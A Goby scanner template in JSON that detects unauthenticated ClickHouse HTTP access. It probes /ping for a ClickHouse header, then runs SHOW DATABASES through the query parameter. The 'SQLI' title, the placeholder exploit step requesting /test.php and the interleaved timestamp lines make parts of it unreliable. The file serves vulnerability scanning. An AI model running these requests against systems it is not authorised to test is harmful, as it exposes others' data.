2022-11-25 02:08:58 -08:00
{
"Name" : "ClickHouse SQLI" ,
"Level" : "3" ,
"Tags" : [
"sqli"
] ,
2022-11-29 10:11:55 -08:00
"GobyQuery" : "banner=\"X-Clickhouse-Summary\" || port=\"8123\"" ,
"Description" : "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time." ,
2022-11-25 02:08:58 -08:00
"Product" : "ClickHouse" ,
2022-11-29 10:11:55 -08:00
"Homepage" : "https://clickhouse.com/" ,
"Author" : "" ,
"Impact" : "Clickhouse has unauthorized access and can perform SQL statements to get data." ,
2022-11-25 02:08:58 -08:00
"Recommendation" : "" ,
"References" : [
"https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
] ,
2022-11-29 10:11:55 -08:00
"HasExp" : true ,
2022-11-25 02:08:58 -08:00
"ExpParams" : null ,
"ExpTips" : {
"Type" : "" ,
"Content" : ""
} ,
"ScanSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/ping" ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$head" ,
"operation" : "contains" ,
"value" : "X-Clickhouse-Summary" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
} ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/?query=SHOW%20DATABASES" ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "default" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "system" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
2022-11-29 10:11:55 -08:00
"ExploitSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/test.php" ,
"follow_redirect" : true ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "test" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"PostTime" : "0000-00-00 00:00:00" ,
"GobyVersion" : "0.0.0"
2022-11-25 02:08:58 -08:00
}